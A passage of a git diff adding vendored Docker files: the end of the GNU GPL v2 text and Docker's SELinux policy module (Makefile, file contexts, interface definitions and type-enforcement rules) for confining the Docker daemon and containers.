this License, and its terms, do not apply to those +sections when you distribute them as separate works. But when you +distribute the same sections as part of a whole which is a work based +on the Program, the distribution of the whole must be on the terms of +this License, whose permissions for other licensees extend to the +entire whole, and thus to each and every part regardless of who wrote it. + +Thus, it is not the intent of this section to claim rights or contest +your rights to work written entirely by you; rather, the intent is to +exercise the right to control the distribution of derivative or +collective works based on the Program. + +In addition, mere aggregation of another work not based on the Program +with the Program (or with a work based on the Program) on a volume of +a storage or distribution medium does not bring the other work under +the scope of this License. + + 3. You may copy and distribute the Program (or a work based on it, +under Section 2) in object code or executable form under the terms of +Sections 1 and 2 above provided that you also do one of the following: + + a) Accompany it with the complete corresponding machine-readable + source code, which must be distributed under the terms of Sections + 1 and 2 above on a medium customarily used for software interchange; or, + + b) Accompany it with a written offer, valid for at least three + years, to give any third party, for a charge no more than your + cost of physically performing source distribution, a complete + machine-readable copy of the corresponding source code, to be + distributed under the terms of Sections 1 and 2 above on a medium + customarily used for software interchange; or, + + c) Accompany it with the information you received as to the offer + to distribute corresponding source code. (This alternative is + allowed only for noncommercial distribution and only if you + received the program in object code or executable form with such + an offer, in accord with Subsection b above.) + +The source code for a work means the preferred form of the work for +making modifications to it. For an executable work, complete source +code means all the source code for all modules it contains, plus any +associated interface definition files, plus the scripts used to +control compilation and installation of the executable. However, as a +special exception, the source code distributed need not include +anything that is normally distributed (in either source or binary +form) with the major components (compiler, kernel, and so on) of the +operating system on which the executable runs, unless that component +itself accompanies the executable. + +If distribution of executable or object code is made by offering +access to copy from a designated place, then offering equivalent +access to copy the source code from the same place counts as +distribution of the source code, even though third parties are not +compelled to copy the source along with the object code. + + 4. You may not copy, modify, sublicense, or distribute the Program +except as expressly provided under this License. Any attempt +otherwise to copy, modify, sublicense or distribute the Program is +void, and will automatically terminate your rights under this License. +However, parties who have received copies, or rights, from you under +this License will not have their licenses terminated so long as such +parties remain in full compliance. + + 5. You are not required to accept this License, since you have not +signed it. However, nothing else grants you permission to modify or +distribute the Program or its derivative works. These actions are +prohibited by law if you do not accept this License. Therefore, by +modifying or distributing the Program (or any work based on the +Program), you indicate your acceptance of this License to do so, and +all its terms and conditions for copying, distributing or modifying +the Program or works based on it. + + 6. Each time you redistribute the Program (or any work based on the +Program), the recipient automatically receives a license from the +original licensor to copy, distribute or modify the Program subject to +these terms and conditions. You may not impose any further +restrictions on the recipients' exercise of the rights granted herein. +You are not responsible for enforcing compliance by third parties to +this License. + + 7. If, as a consequence of a court judgment or allegation of patent +infringement or for any other reason (not limited to patent issues), +conditions are imposed on you (whether by court order, agreement or +otherwise) that contradict the conditions of this License, they do not +excuse you from the conditions of this License. If you cannot +distribute so as to satisfy simultaneously your obligations under this +License and any other pertinent obligations, then as a consequence you +may not distribute the Program at all. For example, if a patent +license would not permit royalty-free redistribution of the Program by +all those who receive copies directly or indirectly through you, then +the only way you could satisfy both it and this License would be to +refrain entirely from distribution of the Program. + +If any portion of this section is held invalid or unenforceable under +any particular circumstance, the balance of the section is intended to +apply and the section as a whole is intended to apply in other +circumstances. + +It is not the purpose of this section to induce you to infringe any +patents or other property right claims or to contest validity of any +such claims; this section has the sole purpose of protecting the +integrity of the free software distribution system, which is +implemented by public license practices. Many people have made +generous contributions to the wide range of software distributed +through that system in reliance on consistent application of that +system; it is up to the author/donor to decide if he or she is willing +to distribute software through any other system and a licensee cannot +impose that choice. + +This section is intended to make thoroughly clear what is believed to +be a consequence of the rest of this License. + + 8. If the distribution and/or use of the Program is restricted in +certain countries either by patents or by copyrighted interfaces, the +original copyright holder who places the Program under this License +may add an explicit geographical distribution limitation excluding +those countries, so that distribution is permitted only in or among +countries not thus excluded. In such case, this License incorporates +the limitation as if written in the body of this License. + + 9. The Free Software Foundation may publish revised and/or new versions +of the General Public License from time to time. Such new versions will +be similar in spirit to the present version, but may differ in detail to +address new problems or concerns. + +Each version is given a distinguishing version number. If the Program +specifies a version number of this License which applies to it and "any +later version", you have the option of following the terms and conditions +either of that version or of any later version published by the Free +Software Foundation. If the Program does not specify a version number of +this License, you may choose any version ever published by the Free Software +Foundation. + + 10. If you wish to incorporate parts of the Program into other free +programs whose distribution conditions are different, write to the author +to ask for permission. For software which is copyrighted by the Free +Software Foundation, write to the Free Software Foundation; we sometimes +make exceptions for this. Our decision will be guided by the two goals +of preserving the free status of all derivatives of our free software and +of promoting the sharing and reuse of software generally. + + NO WARRANTY + + 11. BECAUSE THE PROGRAM IS LICENSED FREE OF CHARGE, THERE IS NO WARRANTY +FOR THE PROGRAM, TO THE EXTENT PERMITTED BY APPLICABLE LAW. EXCEPT WHEN +OTHERWISE STATED IN WRITING THE COPYRIGHT HOLDERS AND/OR OTHER PARTIES +PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED +OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF +MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. THE ENTIRE RISK AS +TO THE QUALITY AND PERFORMANCE OF THE PROGRAM IS WITH YOU. SHOULD THE +PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF ALL NECESSARY SERVICING, +REPAIR OR CORRECTION. + + 12. IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING +WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MAY MODIFY AND/OR +REDISTRIBUTE THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, +INCLUDING ANY GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING +OUT OF THE USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED +TO LOSS OF DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY +YOU OR THIRD PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER +PROGRAMS), EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE +POSSIBILITY OF SUCH DAMAGES. + + END OF TERMS AND CONDITIONS + + How to Apply These Terms to Your New Programs + + If you develop a new program, and you want it to be of the greatest +possible use to the public, the best way to achieve this is to make it +free software which everyone can redistribute and change under these terms. + + To do so, attach the following notices to the program. It is safest +to attach them to the start of each source file to most effectively +convey the exclusion of warranty; and each file should have at least +the "copyright" line and a pointer to where the full notice is found. + + + Copyright (C) + + This program is free software; you can redistribute it and/or modify + it under the terms of the GNU General Public License as published by + the Free Software Foundation; either version 2 of the License, or + (at your option) any later version. + + This program is distributed in the hope that it will be useful, + but WITHOUT ANY WARRANTY; without even the implied warranty of + MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + GNU General Public License for more details. + + You should have received a copy of the GNU General Public License + along with this program; if not, write to the Free Software + Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA + + +Also add information on how to contact you by electronic and paper mail. + +If the program is interactive, make it output a short notice like this +when it starts in an interactive mode: + + Gnomovision version 69, Copyright (C) year name of author + Gnomovision comes with ABSOLUTELY NO WARRANTY; for details type `show w'. + This is free software, and you are welcome to redistribute it + under certain conditions; type `show c' for details. + +The hypothetical commands `show w' and `show c' should show the appropriate +parts of the General Public License. Of course, the commands you use may +be called something other than `show w' and `show c'; they could even be +mouse-clicks or menu items--whatever suits your program. + +You should also get your employer (if you work as a programmer) or your +school, if any, to sign a "copyright disclaimer" for the program, if +necessary. Here is a sample; alter the names: + + Yoyodyne, Inc., hereby disclaims all copyright interest in the program + `Gnomovision' (which makes passes at compilers) written by James Hacker. + + , 1 April 1989 + Ty Coon, President of Vice + +This General Public License does not permit incorporating your program into +proprietary programs. If your program is a subroutine library, you may +consider it more useful to permit linking proprietary applications with the +library. If this is what you want to do, use the GNU Library General +Public License instead of this License. diff --git a/vendor/github.com/docker/docker/contrib/selinux/docker-engine-selinux/Makefile b/vendor/github.com/docker/docker/contrib/selinux/docker-engine-selinux/Makefile new file mode 100644 index 0000000000..1bdc695afe --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/selinux/docker-engine-selinux/Makefile @@ -0,0 +1,16 @@ +TARGETS?=docker +MODULES?=${TARGETS:=.pp.bz2} +SHAREDIR?=/usr/share + +all: ${TARGETS:=.pp.bz2} + +%.pp.bz2: %.pp + @echo Compressing $^ -\> $@ + bzip2 -9 $^ + +%.pp: %.te + make -f ${SHAREDIR}/selinux/devel/Makefile $@ + +clean: + rm -f *~ *.tc *.pp *.pp.bz2 + rm -rf tmp *.tar.gz diff --git a/vendor/github.com/docker/docker/contrib/selinux/docker-engine-selinux/docker.fc b/vendor/github.com/docker/docker/contrib/selinux/docker-engine-selinux/docker.fc new file mode 100644 index 0000000000..467d659604 --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/selinux/docker-engine-selinux/docker.fc @@ -0,0 +1,18 @@ +/root/\.docker gen_context(system_u:object_r:docker_home_t,s0) + +/usr/bin/dockerd -- gen_context(system_u:object_r:docker_exec_t,s0) + +/usr/lib/systemd/system/docker.service -- gen_context(system_u:object_r:docker_unit_file_t,s0) + +/etc/docker(/.*)? gen_context(system_u:object_r:docker_config_t,s0) + +/var/lib/docker(/.*)? gen_context(system_u:object_r:docker_var_lib_t,s0) + +/var/run/docker\.pid -- gen_context(system_u:object_r:docker_var_run_t,s0) +/var/run/docker\.sock -s gen_context(system_u:object_r:docker_var_run_t,s0) +/var/run/docker-client(/.*)? gen_context(system_u:object_r:docker_var_run_t,s0) + +/var/lib/docker/init(/.*)? gen_context(system_u:object_r:docker_share_t,s0) +/var/lib/docker/containers/.*/hosts gen_context(system_u:object_r:docker_share_t,s0) +/var/lib/docker/containers/.*/hostname gen_context(system_u:object_r:docker_share_t,s0) +/var/lib/docker/.*/config\.env gen_context(system_u:object_r:docker_share_t,s0) diff --git a/vendor/github.com/docker/docker/contrib/selinux/docker-engine-selinux/docker.if b/vendor/github.com/docker/docker/contrib/selinux/docker-engine-selinux/docker.if new file mode 100644 index 0000000000..ca075c05c5 --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/selinux/docker-engine-selinux/docker.if @@ -0,0 +1,461 @@ + +## The open-source application container engine. + +######################################## +## +## Execute docker in the docker domain. +## +## +## +## Domain allowed to transition. +## +## +# +interface(`docker_domtrans',` + gen_require(` + type docker_t, docker_exec_t; + ') + + corecmd_search_bin($1) + domtrans_pattern($1, docker_exec_t, docker_t) +') + +######################################## +## +## Execute docker in the caller domain. +## +## +## +## Domain allowed to transition. +## +## +# +interface(`docker_exec',` + gen_require(` + type docker_exec_t; + ') + + corecmd_search_bin($1) + can_exec($1, docker_exec_t) +') + +######################################## +## +## Search docker lib directories. +## +## +## +## Domain allowed access. +## +## +# +interface(`docker_search_lib',` + gen_require(` + type docker_var_lib_t; + ') + + allow $1 docker_var_lib_t:dir search_dir_perms; + files_search_var_lib($1) +') + +######################################## +## +## Execute docker lib directories. +## +## +## +## Domain allowed access. +## +## +# +interface(`docker_exec_lib',` + gen_require(` + type docker_var_lib_t; + ') + + allow $1 docker_var_lib_t:dir search_dir_perms; + can_exec($1, docker_var_lib_t) +') + +######################################## +## +## Read docker lib files. +## +## +## +## Domain allowed access. +## +## +# +interface(`docker_read_lib_files',` + gen_require(` + type docker_var_lib_t; + ') + + files_search_var_lib($1) + read_files_pattern($1, docker_var_lib_t, docker_var_lib_t) +') + +######################################## +## +## Read docker share files. +## +## +## +## Domain allowed access. +## +## +# +interface(`docker_read_share_files',` + gen_require(` + type docker_share_t; + ') + + files_search_var_lib($1) + read_files_pattern($1, docker_share_t, docker_share_t) +') + +######################################## +## +## Manage docker lib files. +## +## +## +## Domain allowed access. +## +## +# +interface(`docker_manage_lib_files',` + gen_require(` + type docker_var_lib_t; + ') + + files_search_var_lib($1) + manage_files_pattern($1, docker_var_lib_t, docker_var_lib_t) + manage_lnk_files_pattern($1, docker_var_lib_t, docker_var_lib_t) +') + +######################################## +## +## Manage docker lib directories. +## +## +## +## Domain allowed access. +## +## +# +interface(`docker_manage_lib_dirs',` + gen_require(` + type docker_var_lib_t; + ') + + files_search_var_lib($1) + manage_dirs_pattern($1, docker_var_lib_t, docker_var_lib_t) +') + +######################################## +## +## Create objects in a docker var lib directory +## with an automatic type transition to +## a specified private type. +## +## +## +## Domain allowed access. +## +## +## +## +## The type of the object to create. +## +## +## +## +## The class of the object to be created. +## +## +## +## +## The name of the object being created. +## +## +# +interface(`docker_lib_filetrans',` + gen_require(` + type docker_var_lib_t; + ') + + filetrans_pattern($1, docker_var_lib_t, $2, $3, $4) +') + +######################################## +## +## Read docker PID files. +## +## +## +## Domain allowed access. +## +## +# +interface(`docker_read_pid_files',` + gen_require(` + type docker_var_run_t; + ') + + files_search_pids($1) + read_files_pattern($1, docker_var_run_t, docker_var_run_t) +') + +######################################## +## +## Execute docker server in the docker domain. +## +## +## +## Domain allowed to transition. +## +## +# +interface(`docker_systemctl',` + gen_require(` + type docker_t; + type docker_unit_file_t; + ') + + systemd_exec_systemctl($1) + init_reload_services($1) + systemd_read_fifo_file_passwd_run($1) + allow $1 docker_unit_file_t:file read_file_perms; + allow $1 docker_unit_file_t:service manage_service_perms; + + ps_process_pattern($1, docker_t) +') + +######################################## +## +## Read and write docker shared memory. +## +## +## +## Domain allowed access. +## +## +# +interface(`docker_rw_sem',` + gen_require(` + type docker_t; + ') + + allow $1 docker_t:sem rw_sem_perms; +') + +####################################### +## +## Read and write the docker pty type. +## +## +## +## Domain allowed access. +## +## +# +interface(`docker_use_ptys',` + gen_require(` + type docker_devpts_t; + ') + + allow $1 docker_devpts_t:chr_file rw_term_perms; +') + +####################################### +## +## Allow domain to create docker content +## +## +## +## Domain allowed access. +## +## +# +interface(`docker_filetrans_named_content',` + + gen_require(` + type docker_var_lib_t; + type docker_share_t; + type docker_log_t; + type docker_var_run_t; + type docker_home_t; + ') + + files_pid_filetrans($1, docker_var_run_t, file, "docker.pid") + files_pid_filetrans($1, docker_var_run_t, sock_file, "docker.sock") + files_pid_filetrans($1, docker_var_run_t, dir, "docker-client") + files_var_lib_filetrans($1, docker_var_lib_t, dir, "docker") + filetrans_pattern($1, docker_var_lib_t, docker_share_t, file, "config.env") + filetrans_pattern($1, docker_var_lib_t, docker_share_t, file, "hosts") + filetrans_pattern($1, docker_var_lib_t, docker_share_t, file, "hostname") + filetrans_pattern($1, docker_var_lib_t, docker_share_t, file, "resolv.conf") + filetrans_pattern($1, docker_var_lib_t, docker_share_t, dir, "init") + userdom_admin_home_dir_filetrans($1, docker_home_t, dir, ".docker") +') + +######################################## +## +## Connect to docker over a unix stream socket. +## +## +## +## Domain allowed access. +## +## +# +interface(`docker_stream_connect',` + gen_require(` + type docker_t, docker_var_run_t; + ') + + files_search_pids($1) + stream_connect_pattern($1, docker_var_run_t, docker_var_run_t, docker_t) +') + +######################################## +## +## Connect to SPC containers over a unix stream socket. +## +## +## +## Domain allowed access. +## +## +# +interface(`docker_spc_stream_connect',` + gen_require(` + type spc_t, spc_var_run_t; + ') + + files_search_pids($1) + files_write_all_pid_sockets($1) + allow $1 spc_t:unix_stream_socket connectto; +') + + +######################################## +## +## All of the rules required to administrate +## an docker environment +## +## +## +## Domain allowed access. +## +## +# +interface(`docker_admin',` + gen_require(` + type docker_t; + type docker_var_lib_t, docker_var_run_t; + type docker_unit_file_t; + type docker_lock_t; + type docker_log_t; + type docker_config_t; + ') + + allow $1 docker_t:process { ptrace signal_perms }; + ps_process_pattern($1, docker_t) + + admin_pattern($1, docker_config_t) + + files_search_var_lib($1) + admin_pattern($1, docker_var_lib_t) + + files_search_pids($1) + admin_pattern($1, docker_var_run_t) + + files_search_locks($1) + admin_pattern($1, docker_lock_t) + + logging_search_logs($1) + admin_pattern($1, docker_log_t) + + docker_systemctl($1) + admin_pattern($1, docker_unit_file_t) + allow $1 docker_unit_file_t:service all_service_perms; + + optional_policy(` + systemd_passwd_agent_exec($1) + systemd_read_fifo_file_passwd_run($1) + ') +') + +interface(`domain_stub_named_filetrans_domain',` + gen_require(` + attribute named_filetrans_domain; + ') +') + +interface(`lvm_stub',` + gen_require(` + type lvm_t; + ') +') +interface(`staff_stub',` + gen_require(` + type staff_t; + ') +') +interface(`virt_stub_svirt_sandbox_domain',` + gen_require(` + attribute svirt_sandbox_domain; + ') +') +interface(`virt_stub_svirt_sandbox_file',` + gen_require(` + type svirt_sandbox_file_t; + ') +') +interface(`fs_dontaudit_remount_tmpfs',` + gen_require(` + type tmpfs_t; + ') + + dontaudit $1 tmpfs_t:filesystem remount; +') +interface(`dev_dontaudit_list_all_dev_nodes',` + gen_require(` + type device_t; + ') + + dontaudit $1 device_t:dir list_dir_perms; +') +interface(`kernel_unlabeled_entry_type',` + gen_require(` + type unlabeled_t; + ') + + domain_entry_file($1, unlabeled_t) +') +interface(`kernel_unlabeled_domtrans',` + gen_require(` + type unlabeled_t; + ') + + read_lnk_files_pattern($1, unlabeled_t, unlabeled_t) + domain_transition_pattern($1, unlabeled_t, $2) + type_transition $1 unlabeled_t:process $2; +') +interface(`files_write_all_pid_sockets',` + gen_require(` + attribute pidfile; + ') + + allow $1 pidfile:sock_file write_sock_file_perms; +') +interface(`dev_dontaudit_mounton_sysfs',` + gen_require(` + type sysfs_t; + ') + + dontaudit $1 sysfs_t:dir mounton; +') diff --git a/vendor/github.com/docker/docker/contrib/selinux/docker-engine-selinux/docker.te b/vendor/github.com/docker/docker/contrib/selinux/docker-engine-selinux/docker.te new file mode 100644 index 0000000000..bad0bb6e4c --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/selinux/docker-engine-selinux/docker.te @@ -0,0 +1,407 @@ +policy_module(docker, 1.0.0) + +######################################## +# +# Declarations +# + +## +##

+## Determine whether docker can +## connect to all TCP ports. +##

+##
+gen_tunable(docker_connect_any, false) + +type docker_t; +type docker_exec_t; +init_daemon_domain(docker_t, docker_exec_t) +domain_subj_id_change_exemption(docker_t) +domain_role_change_exemption(docker_t) + +type spc_t; +domain_type(spc_t) +role system_r types spc_t; + +type spc_var_run_t; +files_pid_file(spc_var_run_t) + +type docker_var_lib_t; +files_type(docker_var_lib_t) + +type docker_home_t; +userdom_user_home_content(docker_home_t) + +type docker_config_t; +files_config_file(docker_config_t) + +type docker_lock_t; +files_lock_file(docker_lock_t) + +type docker_log_t; +logging_log_file(docker_log_t) + +type docker_tmp_t; +files_tmp_file(docker_tmp_t) + +type docker_tmpfs_t; +files_tmpfs_file(docker_tmpfs_t) + +type docker_var_run_t; +files_pid_file(docker_var_run_t) + +type docker_unit_file_t; +systemd_unit_file(docker_unit_file_t) + +type docker_devpts_t; +term_pty(docker_devpts_t) + +type docker_share_t; +files_type(docker_share_t) + +######################################## +# +# docker local policy +# +allow docker_t self:capability { chown kill fowner fsetid mknod net_admin net_bind_service net_raw setfcap }; +allow docker_t self:tun_socket relabelto; +allow docker_t self:process { getattr signal_perms setrlimit setfscreate }; +allow docker_t self:fifo_file rw_fifo_file_perms; +allow docker_t self:unix_stream_socket create_stream_socket_perms; +allow docker_t self:tcp_socket create_stream_socket_perms; +allow docker_t self:udp_socket create_socket_perms; +allow docker_t self:capability2 block_suspend; + +manage_files_pattern(docker_t, docker_home_t, docker_home_t) +manage_dirs_pattern(docker_t, docker_home_t, docker_home_t) +manage_lnk_files_pattern(docker_t, docker_home_t, docker_home_t) +userdom_admin_home_dir_filetrans(docker_t, docker_home_t, dir, ".docker") + +manage_dirs_pattern(docker_t, docker_config_t, docker_config_t) +manage_files_pattern(docker_t, docker_config_t, docker_config_t) +files_etc_filetrans(docker_t, docker_config_t, dir, "docker") + +manage_dirs_pattern(docker_t, docker_lock_t, docker_lock_t) +manage_files_pattern(docker_t, docker_lock_t, docker_lock_t) + +manage_dirs_pattern(docker_t, docker_log_t, docker_log_t) +manage_files_pattern(docker_t, docker_log_t, docker_log_t) +manage_lnk_files_pattern(docker_t, docker_log_t, docker_log_t) +logging_log_filetrans(docker_t, docker_log_t, { dir file lnk_file }) +allow docker_t docker_log_t:dir_file_class_set { relabelfrom relabelto }; + +manage_dirs_pattern(docker_t, docker_tmp_t, docker_tmp_t) +manage_files_pattern(docker_t, docker_tmp_t, docker_tmp_t) +manage_lnk_files_pattern(docker_t, docker_tmp_t, docker_tmp_t) +files_tmp_filetrans(docker_t, docker_tmp_t, { dir file lnk_file }) + +manage_dirs_pattern(docker_t, docker_tmpfs_t, docker_tmpfs_t) +manage_files_pattern(docker_t, docker_tmpfs_t, docker_tmpfs_t) +manage_lnk_files_pattern(docker_t, docker_tmpfs_t, docker_tmpfs_t) +manage_fifo_files_pattern(docker_t, docker_tmpfs_t, docker_tmpfs_t) +manage_chr_files_pattern(docker_t, docker_tmpfs_t, docker_tmpfs_t) +manage_blk_files_pattern(docker_t, docker_tmpfs_t, docker_tmpfs_t) +allow docker_t docker_tmpfs_t:dir relabelfrom; +can_exec(docker_t, docker_tmpfs_t) +fs_tmpfs_filetrans(docker_t, docker_tmpfs_t, { dir file }) +allow docker_t docker_tmpfs_t:chr_file mounton; + +manage_dirs_pattern(docker_t, docker_share_t, docker_share_t) +manage_files_pattern(docker_t, docker_share_t, docker_share_t) +manage_lnk_files_pattern(docker_t, docker_share_t, docker_share_t) +allow docker_t docker_share_t:dir_file_class_set { relabelfrom relabelto }; + +can_exec(docker_t, docker_share_t) +#docker_filetrans_named_content(docker_t) + +manage_dirs_pattern(docker_t, docker_var_lib_t, docker_var_lib_t) +manage_chr_files_pattern(docker_t, docker_var_lib_t, docker_var_lib_t) +manage_blk_files_pattern(docker_t, docker_var_lib_t, docker_var_lib_t) +manage_files_pattern(docker_t, docker_var_lib_t, docker_var_lib_t) +manage_lnk_files_pattern(docker_t, docker_var_lib_t, docker_var_lib_t) +allow docker_t docker_var_lib_t:dir_file_class_set { relabelfrom relabelto }; +files_var_lib_filetrans(docker_t, docker_var_lib_t, { dir file lnk_file }) + +manage_dirs_pattern(docker_t, docker_var_run_t, docker_var_run_t) +manage_files_pattern(docker_t, docker_var_run_t, docker_var_run_t) +manage_sock_files_pattern(docker_t, docker_var_run_t, docker_var_run_t) +manage_lnk_files_pattern(docker_t, docker_var_run_t, docker_var_run_t) +files_pid_filetrans(docker_t, docker_var_run_t, { dir file lnk_file sock_file }) + +allow docker_t docker_devpts_t:chr_file { relabelfrom rw_chr_file_perms setattr_chr_file_perms }; +term_create_pty(docker_t, docker_devpts_t) + +kernel_read_system_state(docker_t) +kernel_read_network_state(docker_t) +kernel_read_all_sysctls(docker_t) +kernel_rw_net_sysctls(docker_t) +kernel_setsched(docker_t) +kernel_read_all_proc(docker_t) + +domain_use_interactive_fds(docker_t) +domain_dontaudit_read_all_domains_state(docker_t) + +corecmd_exec_bin(docker_t) +corecmd_exec_shell(docker_t) + +corenet_tcp_bind_generic_node(docker_t) +corenet_tcp_sendrecv_generic_if(docker_t) +corenet_tcp_sendrecv_generic_node(docker_t) +corenet_tcp_sendrecv_generic_port(docker_t) +corenet_tcp_bind_all_ports(docker_t) +corenet_tcp_connect_http_port(docker_t) +corenet_tcp_connect_commplex_main_port(docker_t) +corenet_udp_sendrecv_generic_if(docker_t) +corenet_udp_sendrecv_generic_node(docker_t) +corenet_udp_sendrecv_all_ports(docker_t) +corenet_udp_bind_generic_node(docker_t) +corenet_udp_bind_all_ports(docker_t) + +files_read_config_files(docker_t) +files_dontaudit_getattr_all_dirs(docker_t) +files_dontaudit_getattr_all_files(docker_t) + +fs_read_cgroup_files(docker_t) +fs_read_tmpfs_symlinks(docker_t) +fs_search_all(docker_t) +fs_getattr_all_fs(docker_t) + +storage_raw_rw_fixed_disk(docker_t) + +auth_use_nsswitch(docker_t) +auth_dontaudit_getattr_shadow(docker_t) + +init_read_state(docker_t) +init_status(docker_t) + +logging_send_audit_msgs(docker_t) +logging_send_syslog_msg(docker_t) + +miscfiles_read_localization(docker_t) + +mount_domtrans(docker_t) + +seutil_read_default_contexts(docker_t) +seutil_read_config(docker_t) + +sysnet_dns_name_resolve(docker_t) +sysnet_exec_ifconfig(docker_t) + +optional_policy(` + rpm_exec(docker_t) + rpm_read_db(docker_t) + rpm_exec(docker_t) +') + +optional_policy(` + fstools_domtrans(docker_t) +') + +optional_policy(` + iptables_domtrans(docker_t) +') + +optional_policy(` + openvswitch_stream_connect(docker_t) +') + +allow docker_t self:capability { dac_override setgid setpcap setuid sys_admin sys_boot sys_chroot sys_ptrace }; + +allow docker_t self:process { getcap setcap setexec setpgid setsched signal_perms }; + +allow docker_t self:netlink_route_socket rw_netlink_socket_perms;; +allow docker_t self:netlink_audit_socket create_netlink_socket_perms; +allow docker_t self:unix_dgram_socket { create_socket_perms sendto }; +allow docker_t self:unix_stream_socket { create_stream_socket_perms connectto }; + +allow docker_t docker_var_lib_t:dir mounton; +allow docker_t docker_var_lib_t:chr_file mounton; +can_exec(docker_t, docker_var_lib_t) + +kernel_dontaudit_setsched(docker_t) +kernel_get_sysvipc_info(docker_t) +kernel_request_load_module(docker_t) +kernel_mounton_messages(docker_t) +kernel_mounton_all_proc(docker_t) +kernel_mounton_all_sysctls(docker_t) +kernel_unlabeled_entry_type(spc_t) +kernel_unlabeled_domtrans(docker_t, spc_t) + +dev_getattr_all(docker_t) +dev_getattr_sysfs_fs(docker_t) +dev_read_urand(docker_t) +dev_read_lvm_control(docker_t) +dev_rw_sysfs(docker_t) +dev_rw_loop_control(docker_t) +dev_rw_lvm_control(docker_t) + +files_getattr_isid_type_dirs(docker_t) +files_manage_isid_type_dirs(docker_t) +files_manage_isid_type_files(docker_t) +files_manage_isid_type_symlinks(docker_t) +files_manage_isid_type_chr_files(docker_t) +files_manage_isid_type_blk_files(docker_t) +files_exec_isid_files(docker_t) +files_mounton_isid(docker_t) +files_mounton_non_security(docker_t) +files_mounton_isid_type_chr_file(docker_t) + +fs_mount_all_fs(docker_t) +fs_unmount_all_fs(docker_t) +fs_remount_all_fs(docker_t) +files_mounton_isid(docker_t) +fs_manage_cgroup_dirs(docker_t) +fs_manage_cgroup_files(docker_t) +fs_relabelfrom_xattr_fs(docker_t) +fs_relabelfrom_tmpfs(docker_t) +fs_read_tmpfs_symlinks(docker_t) +fs_list_hugetlbfs(docker_t) + +term_use_generic_ptys(docker_t) +term_use_ptmx(docker_t) +term_getattr_pty_fs(docker_t) +term_relabel_pty_fs(docker_t) +term_mounton_unallocated_ttys(docker_t) + +modutils_domtrans_insmod(docker_t) + +systemd_status_all_unit_files(docker_t) +systemd_start_systemd_services(docker_t) + +userdom_stream_connect(docker_t) +userdom_search_user_home_content(docker_t) +userdom_read_all_users_state(docker_t) +userdom_relabel_user_home_files(docker_t) +userdom_relabel_user_tmp_files(docker_t) +userdom_relabel_user_tmp_dirs(docker_t) + +optional_policy(` + gpm_getattr_gpmctl(docker_t) +') + +optional_policy(` + dbus_system_bus_client(docker_t) + init_dbus_chat(docker_t) + init_start_transient_unit(docker_t) + + optional_policy(` + systemd_dbus_chat_logind(docker_t) + ') + + optional_policy(` + firewalld_dbus_chat(docker_t) + ') +') + +optional_policy(` + udev_read_db(docker_t) +') + +optional_policy(` + virt_read_config(docker_t) + virt_exec(docker_t) + virt_stream_connect(docker_t) + virt_stream_connect_sandbox(docker_t) + virt_exec_sandbox_files(docker_t) + virt_manage_sandbox_files(docker_t) + virt_relabel_sandbox_filesystem(docker_t) + virt_transition_svirt_sandbox(docker_t, system_r) + virt_mounton_sandbox_file(docker_t) +# virt_attach_sandbox_tun_iface(docker_t) + allow docker_t svirt_sandbox_domain:tun_socket relabelfrom; +') + +tunable_policy(`docker_connect_any',` + corenet_tcp_connect_all_ports(docker_t) + corenet_sendrecv_all_packets(docker_t) + corenet_tcp_sendrecv_all_ports(docker_t) +') + +######################################## +# +# spc local policy +# +domain_entry_file(spc_t, docker_share_t) +domain_entry_file(spc_t, docker_var_lib_t) +role system_r types spc_t; + +domain_entry_file(spc_t, docker_share_t) +domain_entry_file(spc_t, docker_var_lib_t) +domtrans_pattern(docker_t, docker_share_t, spc_t) +domtrans_pattern(docker_t, docker_var_lib_t, spc_t) +allow docker_t spc_t:process { setsched signal_perms }; +ps_process_pattern(docker_t, spc_t) +allow docker_t spc_t:socket_class_set { relabelto relabelfrom }; + +optional_policy(` + dbus_chat_system_bus(spc_t) +') + +optional_policy(` + unconfined_domain_noaudit(spc_t) +') + +optional_policy(` + unconfined_domain(docker_t) +') + +optional_policy(` + virt_transition_svirt_sandbox(spc_t, system_r) +') + +######################################## +# +# docker upstream policy +# + +optional_policy(` +# domain_stub_named_filetrans_domain() + gen_require(` + attribute named_filetrans_domain; + ') + + docker_filetrans_named_content(named_filetrans_domain) +') + +optional_policy(` + lvm_stub() + docker_rw_sem(lvm_t) +') + +optional_policy(` + staff_stub() + docker_stream_connect(staff_t) + docker_exec(staff_t) +') + +optional_policy(` + virt_stub_svirt_sandbox_domain() + virt_stub_svirt_sandbox_file() + allow svirt_sandbox_domain self:netlink_kobject_uevent_socket create_socket_perms; + docker_read_share_files(svirt_sandbox_domain) + docker_lib_filetrans(svirt_sandbox_domain,svirt_sandbox_file_t, sock_file) + docker_use_ptys(svirt_sandbox_domain) + docker_spc_stream_connect(svirt_sandbox_domain) + fs_list_tmpfs(svirt_sandbox_domain) + fs_rw_hugetlbfs_files(svirt_sandbox_domain) + fs_dontaudit_remount_tmpfs(svirt_sandbox_domain) + dev_dontaudit_mounton_sysfs(svirt_sandbox_domain) + + tunable_policy(`virt_sandbox_use_fusefs',` + fs_manage_fusefs_dirs(svirt_sandbox_domain) + fs_manage_fusefs_files(svirt_sandbox_domain) + fs_manage_fusefs_symlinks(svirt_sandbox_domain) + ') + gen_require(` + attribute domain; + ') + + dontaudit svirt_sandbox_domain domain:key {search link}; +') + +optional_policy(` + gen_require(` + type pcp_pmcd_t; + ') + 